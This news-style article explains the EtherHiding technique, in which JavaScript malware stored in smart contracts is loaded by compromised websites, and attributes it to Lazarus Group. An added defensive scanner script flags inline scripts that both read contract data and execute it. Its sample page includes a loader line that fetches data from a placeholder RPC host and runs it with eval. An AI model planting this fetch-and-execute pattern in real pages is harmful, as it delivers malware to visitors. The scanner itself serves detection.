North Korean Hackers Hide Malware Inside Smart Contracts: A New Threat to Blockchain Security


Published on: 17 November, 2025


Blockchain technology has long been praised for its immutability, transparency, and security. However, new research shows that even decentralized systems can be targeted by sophisticated attacks. Cybersecurity experts report that North Korean state-sponsored hackers have developed a new method of embedding malware directly into smart contracts on public blockchains.

This attack method is part of the emerging trend called EtherHiding, where attackers leverage blockchain networks themselves as a malware delivery infrastructure. The malware becomes permanent, unstoppable, and extremely difficult to detect.

Who Is Behind the Attack?

According to cybersecurity analysts, the attacks are linked to the Lazarus Group, a notorious North Korean hacker organization responsible for:

  • The Axie Infinity Ronin Bridge hack ($625 million)
  • The Harmony Horizon breach ($100 million)
  • Phishing campaigns targeting crypto professionals
  • Malware attacks on Asian cryptocurrency exchanges

Lazarus is known for its innovative techniques to steal cryptocurrency assets to support North Korea’s sanctioned economy. Their tactics now include malware embedded in smart contracts.

What Is EtherHiding?

EtherHiding is a hacking technique in which attackers:

  • Insert malicious JavaScript payloads
  • Hide them inside blockchain smart contracts
  • Trigger malware execution when websites load data from these contracts

The malware is split into encrypted segments to evade detection. Even if discovered, it cannot be removed because it resides on the blockchain, not a traditional server.

This method has been observed on:

  • Ethereum
  • BNB Chain / Binance Smart Chain
  • Other EVM-compatible networks

How Malware Is Embedded in Smart Contracts

  1. Create or hijack a smart contract: Deploy new contracts or exploit vulnerable existing ones.
  2. Add encrypted malicious code: Small portions of the JavaScript payload are stored in contract storage, logs, and on-chain metadata.
  3. Infect websites: Hackers link scripts from compromised Web2 websites (e.g., WordPress) to malicious smart contracts.
  4. Deploy malware via smart contract: When a user visits the compromised site, their browser decrypts and runs the malware silently.
  5. Perpetual attack: The malware remains active and can be updated at any time by attackers.
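
An added example, not from the article or its sources: the compromised page in steps 3 and 4 has to carry a script that reads contract data and then executes it, and a site owner can flag that shape in their own HTML. The patterns, the verdict rule, the `rpc` helper inside the sample, the placeholder address and the `rpc.example.invalid` host are all assumptions made for illustration.

```javascript
// Added example: flag inline scripts that read contract data and then execute it.
// Patterns are illustrative assumptions, not indicators taken from the article.
const PATTERNS = {
  chainRead: /\beth_call\b|\bJsonRpcProvider\b|\bweb3\.eth\b/, // reads on-chain data
  contractAddress: /\b0x[0-9a-fA-F]{40}\b/,                     // hard-coded EVM address
  decode: /\batob\s*\(|\bfromCharCode\b|\bTextDecoder\b/,       // payload decoding
  dynamicExec: /\beval\s*\(|\bnew\s+Function\s*\(/,             // runs fetched text as code
};

function extractInlineScripts(html) {
  const scripts = [];
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    if (m[1].trim()) scripts.push(m[1]); // external src-only tags have an empty body
  }
  return scripts;
}

function classifyScript(source) {
  const hits = Object.keys(PATTERNS).filter((name) => PATTERNS[name].test(source));
  const reads = hits.includes("chainRead");
  const executes = hits.includes("dynamicExec");
  let verdict = "clean";
  if (reads && executes) verdict = "suspicious";  // chain data flows toward execution
  else if (reads || executes) verdict = "review"; // one half only: check manually
  return { verdict, hits };
}

function scanPage(html) {
  return extractInlineScripts(html).map((src, index) => ({ index, ...classifyScript(src) }));
}

// Constructed sample page (not captured data); `rpc` is a hypothetical helper.
const ADDR = "0x" + "0".repeat(40);
const SAMPLE_PAGE = `
<html><head>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>
  // wallet widget: reads a balance and only renders text
  rpc("https://rpc.example.invalid", { method: "eth_call", to: "${ADDR}" })
    .then((hex) => { document.title = String(parseInt(hex, 16)); });
</script>
<script>
  // injected loader shape: contract return value is decoded and executed
  rpc("https://rpc.example.invalid", { method: "eth_call", to: "${ADDR}" })
    .then((hex) => eval(atob(hex)));
</script>
</head></html>`;

console.log(JSON.stringify(scanPage(SAMPLE_PAGE), null, 2));
```

External `<script src>` files are not fetched here; run `classifyScript` over their contents as well, for example while checking theme and plugin files for unexpected changes.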

Risks of EtherHiding Attacks

  • Impossible to remove malware once embedded in smart contracts.
  • Payloads can be updated indefinitely by attackers.
  • Hard to detect due to encryption and distributed storage.
  • Affects both Web2 and Web3 users.
  • Conventional cybersecurity tools cannot scan blockchain-based malware.